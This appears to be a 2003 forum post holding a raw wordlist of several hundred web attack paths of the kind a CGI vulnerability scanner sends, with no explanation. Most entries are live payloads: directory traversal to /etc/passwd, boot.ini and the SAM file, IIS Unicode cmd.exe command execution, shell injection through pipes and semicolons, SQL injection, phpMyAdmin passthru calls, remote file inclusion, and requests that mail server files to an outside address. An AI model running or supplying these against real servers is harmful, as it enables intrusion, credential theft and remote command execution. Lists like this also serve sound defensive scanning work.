orort
12-09-2003, 09:16
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doctype=raw&Collection=
:631/admin/?op=%c0
/cgi-bin/PGPMail.pl
/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3 D'hoschi'%23
/cgi-bin/loadpage.cgi
/cgi-bin/forma
/cgi-bin/mailto.cgi
/ezboard/ezboard.cgi
/mailman/edithtml
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
/dms/DMSDump
/admin/
/mall_log_files/order.log
/cgi-bin/stats.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/lsindex2.bat
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/private/
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/priv/
/cgi-bin/source.asp
/xsql/java/demo/
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/test.txt;%20/bin/ls
/WebSTAR%20LOG
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/.dS_store
/webstar.log
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cgi-bin/whois_raw.cgi
/cgi-bin/FormMail.cgi
/../../shadow
:8003/Display
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/inc/sql.inc
/global.asa%3f.jsp
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cgi-bin/carbo.dll
/cgi-bin/store/agora.cgi?page=hoschi.html
/cgi-bin/test.bat
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts
/discuss/passwd.txt
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/pls/demo/%08owa_util.signature
/example.jsp../
/&@#&@#&@#&@#&@#&@#&@#.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/shtml/
/ChipCfg
/index.jsp::$DATA
/test.jsp..
/cgi-bin/postie.exe
/cgi-bin/htmlscript
/pls/demo/owa_util.showsource?cname=owa_util
/images/tmp.txt
/%2eHTACCESS
/store/temp_customers/
/ezboard/ezadmin.cgi
/*.jhtml/
:80/../../../autoexec.bat
/cgi-bin/upload.cgi
/pccsmysqladm/incs/dbconnect.inc
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/*.shtml/login.jsp
/iisadmpwd/aexp2.htr
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
/main.asp+.htr
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/phprocketaddin/?page=../../../../../../../etc/hosts
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/fpexplore.exe
/db.inc
/user_info.php3?user_username=''+or+admin_level=2+o r+username%3d'x'+and+users.id=access.user_id;%00
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/scripts
/ifx/?LO=../../../../../../../../../etc/hosts
/cgi-bin/webgais
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/iisadmpwd/aexp4.htr
/orders/orders.txt
/index.jsp../
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/info/
/_AuthChangeUrl
/iissamples/
/cgi-bin/webboard/generate.cgi?&@#&@#&@#&@#&@#&@#&@#=../../../../../../../../../etc/hosts%00&board=tst
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/board.cgi
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/cgi-bin/htimage.exe
/dms0
/global.asax
/scripts/samples/ctguestb.idc
/iisadmpwd/
/./WEB-INF/
/pw/storemgr.pw
/includes/
/class/mysql.class
/search/s97_cgi.exe
/scripts/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/cgi-bin/cart32.exe/expdate
/cgi-bin/mailsend.exe
/ext.dll%00
/cgi-bin/build.cgi
/forums/forumdisplay.php?s=&forumid=
/_vti_pvt
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/shtml.exe
/cgi-bin/cgitest.exe
/Administration/
/siteserver/publishing/viewcode.asp?source=/tata.asp
:8080/anything.jsp
/cgi-bin/formhandler.cgi
/SiteServer/Admin/commerce/foundation/driver.asp
/.../
/cfdocs/snippets/setlocale.cfm
/AdvWorks/equipment/catalog_type.asp
/cgi-bin/bnbform
/submit.php
/_mem_bin/remind.asp
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/cgi-bin/imapcern.exe
/%00.nsf/../lotus/domino/notes.ini
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/webplus?script=
/cgi-bin/Count.cgi
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/wais.pl
/cgi-bin/environ.pl
:30001/../../template/shared/indexTemplate.xml
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/cgi-bin/Ultimate.cgi
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:3128/../../../conf/Eserv.ini
/cgi-bin/filemail.pl
/cgi-bin/printenv
/cgi-bin/faxsurvey
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
:8000/./WEB-INF/
/perl
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/cgi-bin/commander.pl
/passcfg
/join.cfm
/cgi-sys/PGPMail.pl
/demo/email/sendmail.jsp
/test%2ejsp
/SiteServer/Admin/commerce/foundation/domain.asp
/cgi-bin/tst.bat
/2600-cgi/ezmlm-cgi
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/perl
/cgi-bin/wwwadmin.cgi
/cgi-bin/webdist.cgi
:9090/board.html
/cfdocs/exampleapp/publish/admin/add&@#&@#&@#&@#&@#&@#&@#.cfm
/cgi-bin/textcounter.pl
/cgi-bin/campas
:444/..\..\..\..\..\autoexec.bat
/demo/email/sendmail.jsp
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi/bin/test.txt;%20/bin/ls
/cgi-bin/dcguest/dcguest.cgi
/cgi-dos/args.bat
/scripts/texis.exe/ngohos
/scripts/test.bat
/*.jsp::$DATA/
/cgi-dos/foo.cmd?xxx&dir
/hypermail
/cgi-bin/view-source
/cgi-bin/tst2.bat
/netget?sid=user&msg=300&file=/../../../filename.ext
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/+./
/cgi-bin/AnyForm2
:801/../../../../../../../../etc/hosts
/cgi-bin/scripts/cart.pl?env
/minivend/catalog.cfg
/dbconfig.inc
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/cgi-bin/boozt/admin/index.cgi
/cgi-bin/search.pl?form=search.pl%00
/cfdocs/exampleapp/email/getfile.cfm
/cgi-shl
/iisadmpwd/aexp.htr
:8002/Newuser?Image=../../database/rbsserv.mdb
/cgi-bin/responder.cgi
/scripts/files.pl
/~test/
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/servlet/jsp/../../tst.txt
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/cgi-bin/whois.cgi
/cgi-bin/blat.exe
/Secure/Local/console/cmhome.htm
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/rguest.exe
/cgi-bin/unlg1.1
/AdLogin.pm
/interscan/cgi-bin/FtpSave.dll?I'm%20here
:8000/cgi/wja?page=wja
/..../
:8100//WEB-INF/
/cgi-bin/dumpenv.pl
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/adcycle/adcenter.cgi
/cgi-bin-sdb/
/cgi-bin/process_bug.cgi
/pass?loginpass=a&redirect=0%2F&Submit=Login
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/index%2ejsp
/.ns4/../winnt/win.ini
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
/cgi-bin/post16.exe
/cgi-bin/environ.cgi
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/ext.dll
/admin.php3?admin=whatever
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"&@#&@#&@#&@#&@#&@#&@#-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00
/cgi-bin/admin.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/test.pl
/cgi-bin/mailform.cgi
/cgi-bin/echo2
:9090/examples/applications/bboard/bboard_frames.html
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/cgi-bin/echo.bat
/soap/servlet/Spy
/cfdocs/snippets/fileexists.cfm
/events4.nsf
/scripts/blat.exe
/Admin/knowledge/dsmgr/users/GroupManager.asp
/scripts/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/iisadmpwd/aexp3.htr
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/orders/mountain.cfg
/cgi-bin/texis/hoschiboschi
/cgi-bin/bb-rep.sh
/~root/
/ad.cgi?file=../../../../../../../../etc/hosts
/cgiWebupdate.exe
/a%5c.aspx
/oprocmgr-service
/iissamples/sdk/asp/docs/codebrws.asp
/msadc/msadcs.dll
/cgi-bin/www-sql
:8888/admin.cgi
/cgi-bin/ppdscgi.exe
/scripts/MailPost.exe
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cfdocs/expeval/sendmail.cfm
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
/admin/includes/
/search/iaquery.exe%3f
:5000/
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/pls/admin_/help/..%255Cplsql.conf
/cgi-bin/test.cgi
/~named/
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/.www.my.cnf
/cgi-bin/test.php3
/ez2000/ezadmin.cgi
/cgi/cvsweb.cgi
/cgi-bin/forum.pl
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/default.asp%3f.htr
/servlet/Spy
/applist.asp
/phpBB/bb_memberlist.php?sortby=user_regdate
/include/
/cgi-bin/ping.cgi
/_private/form_results.txt
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/..../
/file/main.jhtml
/cgi-bin/foo.cmd?xxx&dir
/global.asa%3f.htr
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/cgi-bin/mailme.exe
/bigconf.cgi
/cgi-bin/cookmail/cookmail.exe
/scripts/c32web.exe/ChangeAdminPassword
/~tmp/
/cgi-bin/get32.exe
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/cgi-bin/mail.cgi
/cgi-bin/formprocessor.asp?MailTo=swoopme@hotmail.com&MailFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/cpmdaemon.cgi
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/file/index.shtml
/cgi-bin/test.exe
/_mem_bin/auoconfig.asp
/cgi-bin/web2mail.cgi
/cfdocs/cfmlsyntaxcheck.cfm
/default.asp+.htr
/cgi-bin/DCShop/Orders/orders.txt
/ssi/envout.bat
/cgi-bin/mailfile?MailTo=swoopme@hotmail.com&FileName=mailfile:c&Subject=tst&MailFrom=tst@no.net
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/index.JHTML
/merchants/admin.pw
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/calender.pl
/https-admserv/config/admpw
/cgi-bin/wrap
/modules.php?name=Members_List&&sql_debug=1
/cgi-bin/admin.cgi
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/examples/jsp/snp/anything.snp
/......autoexec.bat
/cgi-bin/showfile
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/~/
/publisher/
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/cgi-bin/bigconf.cgi
/AdSamples/config/site.csc
/cgi-bin/mailform.pl
/foldoc/template.cgi?template.cgi
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/add_ftp.cgi
/..../scandisk.log
/cgi-bin/cgimail.exe
:9000/cgi-bin/query%3f
/Test11.asp
/ows-bin/owa/owa%5futil%2eshowsource
/%00/
/cgi-bin/ads.cgi
:8000/file/%2E%2E/test1.mp3
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/admin/
/administration/
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/scripts/convert.bas
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/~guest/
/cgi-bin/console.exe?page_size=
/fcgi-bin/echo
/4DBin/_/C:/inetpub/../boot.ini
/store/customers/
/cgi-bin/getcomments.pl
/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('/bin/ls')."
/cgi-bin/forums/dcboard.cgi
/.www.my.cnf
/~nobody/
/cgi-bin/cwmail.ini
/iisadmpwd/anot3.htr
:8010/
/+/
/interscan/cgi-bin/FtpSave.dll?yes
/scripts/tools/getdrvrs.exe
/samples/Search/queryhit.htm
/inc/
/jsp/source.jsp
//WEB-INF/webapp.properties
/servlet/SurveyXMLServlet?jeaaa.txt
/cgi-bin/bnbform.cgi
/cgi-bin/w3mail/login.cgi
:8080/../examples//WEB-INF/../../../../../
/.jsp/WEB-INF/classes/Env.java
:800/C:/
/cgi-bin/info2www
/cgi-win/
/_vti_inf.html
/4DBin/_/../inetpub/../boot.ini
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/global.asa::$DATA
/cgi-bin/wwwthreads/changedisplay.pl
/cgi-bin/wwwadmin.pl
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/dcboard.cgi
/cgi-bin/netauth.cgi?cmd=show&page=../../
/chip.ini
/manual.php
/scripts/*.pl
/ubb/register.php
/cgi-bin/postings.cgi
/anything.jsp
/.HTACCESS.
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/cgi-bin/imapncsa.exe
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cgi-bin/uploadn.asp
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
:8010/d://
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
:8010/c://
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/postcard.pl
/examples/servlet/SnoopServlet
/cgi-bin/calender_admin.pl
/scripts/Carello/add.exe
/cgi-bin/.fhp
/cgi-bin/search.pl
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPassword_1
/cgi-win/uploader.exe
:8080/examples/jsp/snp/anything.snp
/~admin/
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.cgi%3fletter=
/inc/odbc.inc
/pi_admin.admin
/cgi-bin/cookmail/cookmail
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/ConsoleHelp/
/cgi-bin/gettext.pl
/.html/............/autoexec.bat
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/survey.cgi
/AspUpload/Samples/Test11.asp
/ubb/cgi-bin/postings.cgi
/4DBin/_/../winnt/repair/sam._
/ows-bin/perlidlc.bat?&dir
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/scripts/script.cmd%3f&dir
/stats/
/cgi-home/
/~lp/
/search97/search97.vts
/PDG_Cart/order.log
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/~bin/
/cfdocs/expeval/openfile.cfm
/cgi-bin/sendmail.cgi
/mysql.class
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
:8080/../../../conf/Eserv.ini
/cgi-bin/wsendmail.exe
/iissamples/exair/search/qsumrhit.htw
/~nobody/etc/
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/cgi-bin/FormMail.pl
/cgi-bin/allmanage.cgi
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/perl.exe
/cgi-bin/scripts/cart.pl
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/wwwboard/wwwadmin.cgi
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/cgi-bin/mailmepro.exe
/iisadmpwd/_AuthChangeUrl
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/files.pl
/wwwboard/wwwadmin.pl
/scripts/mailme.exe
/scripts/slxweb.dll/admin
/robots.txt
/cgi-bin/powerup/r.pl?FILE=main.html
/_private/shopping_cart.mdb
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/alibaba.pl
/default.php%20%20
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
/cgi-bin/dfire.cgi
/scripts/wguest.exe
/cgi-bin/forumdisplay.cgi
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/auctiondeluxe/auction.pl?action=tst
/~log/
/cgi-bin/handler
/names.nsf/Open
:12000
/example.jsp..
/../../../../../../../boot.ini
/scripts/bdir.htr
/interscan/cgi-bin/FtpSave.dll?no
/ads/adpassword.txt
/cgi-bin/formmail.cgi
/remote_login.pl%20
/cgi-bin/formto.pl
/cgi-bin/futureforum.cgi
/session/adminlogin?RCpage=/sysadmin/index.stm
/examples/applications/bboard/bboard_frames.html
/deletecontact.php?item_id=100+OR+TRUE+;
:8080/\../readme.txt
//WEB-INF/
/cgi-bin/cookmail
/cfdocs/expeval/exprcalc.cfm
:9998/
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/active.log
/logs/webstar.log
/global.cnf
/scripts/process_bug.cgi
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/cgi-bin/pfdisplay
/hostingcontroller
/cgi-bin/php.cgi
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
:8080/examples/servlet/SnoopServlet
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
:8888/
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/database.nsf?EditDocument
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=swoopme@hotmail.com
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/advwebadmin
:8000/servlet/jsp/../../tst.txt
/build.cgi
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/run/forma
/cgi-bin/nph-test-cgi
/index.search
/cgi-bin/wwwboard.pl
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/cgi-bin/fi
/phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru('/bin/ls')."
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/scripts/test.exe
/components/AspUpload/Samples/UploadScript11.asp
:8080/index.js%2570
/inc/sql.inc
/scripts/perl.exe
/iisadmpwd/aexp2b.htr
/fcgi-bin/echo2
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/odbc.inc
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/processit.pl
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/sbin/
/cgibin/amadmin.pl?setpasswd
/servlet/WebPopServlet?config=uii.txt
/cgi-bin/edit.pl
/cgi-bin/adpassword.txt
/cgi-bin/lsin.exe
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/pi?page=document/show_file&id=
/."./."./Perl/eg/core/findtar
/cgi-bin/input.bat
/.photon/voyager/config.full
/pls/demo/owa_util.signature
/cgi-bin/echo
/.../.../scandisk.log
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/java/
/cgi-bin/texis.exe/ngohos
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/ows-bin/*.bat?&dir
/search.dll?search?query=%00&logic=AND
/domcfg.nsf/URLRedirect/%3fOpenForm
:8088
/cgi-bin/awl/auctionweaver.pl
/include/dbconfig.inc
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/cgi-bin/webdata_test.pl
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/ChipCfg.cfg
/search%3f
/admin/?op=%c0
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/adsamples/config/site.csc
/domcfg.nsf/%3fopen
//WEB-INF/web.xml
/cgi-bin/bb-ack.sh
/cgi-bin/mailform.exe
/cgi-bin/OrderForm.cgi
/~logs/
/oprocmgr-status
/cgi-bin/scripts/cart.pl?vars
:3128/../../../../
/a.jsp//..//..//..//..//..//../winnt/win.ini
/global.asax.cs
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/compose.php
/iishelp/iis/misc/iirturnh.htw
/index.jsp..
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
:8080/../ssd.ini
/cgi-bin/newsdesk.cgi?t=../pass.txt
/oetaki/oetaki.cgi
:9090
m/search.dll?search?query=/&logic=AND
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/cgi-bin/
/way-board/way-board.cgi?db=way-board.cgi%00
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/test.bat
/cgi-bin/uncgi
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/default.php3%20%20
/cgi-bin/tst.bat
/scripts/wsendmail.exe
/iisadmpwd/achg.htr
:8000/servlet/ssifilter/../../test.jsp
/scripts/mailsend.exe
/cgi-bin/phf
/cgi-bin/phpinfo.php
/_vti_bin/shtml.dll
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+
/cgi-bin/get16.exe
/cgi-bin/hello.bat
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/webwho.pl
/scripts/rguest.exe
/asearch.cnf
/servlet/file
/scripts/postie.cgi
/global.asa+.htr
/cgi-bin/formmail.pl
/msadc/samples/adctest.asp
/doc/
/subscribe.pl
/cgi-bin/html_page?TEMPLATE=main
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/++./
/bin/common/user_update_admin.pl
/include/test.php
/cgi-bin/db2www.exe/../../db2www.ini
/scripts/formvar.exe
/cgi-bin/rmp_query
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
:8000/./WEB-INF/web.xml
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/file/index.jhtml
/domcfg.nsf/viewname%3fSearchView&Query="*"
/cgi-bin/ibillpm.pl
:8100//WEB-INF/web.xml
/cgi-bin/html_page?TEMPLATE=main
:8383
/scripts/script.bat%3f&dir
/index.php3%20%20
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/decsadm.nsf
/cgi-bin/plusmail
/cgi-bin/msn.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/db2_doc/html/db2srsen.exe
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/ROADS/cgi-bin/search.pl?form=search.pl%00
/++/
/cgi-bin/simple/config/menu
/includes/global.inc
:8010/..../
/cgi-bin/cs.exe?action=
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/cgi-bin/infosrch.cgi
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/."./."./winnt/reapir/sam._%20.pl
/secret/index.html
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/wwwboard/passwd.txt
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
:6346/........../windows/win.ini
/userinfo.php?uid=33;
/a/
/global.asa%20.pl
/_vti_bin/_vti_aut/mtd2lv.dll
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/pls/demo/%0aowa_util.signature
/cgi-bin/passcfg
/upload.html
/pls/admin_/?
/doc/packages/
/iissamples/exair/howitworks/codebrws.asp
/pls/demo/%20owa_util.signature
/%2ehtpasswd
/stat/
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts
/session/pagecount?page=
/run.cgi
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/tst/psoft.hsphere.CP/tst/?template_name=x
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/soap/servlet/soaprouter
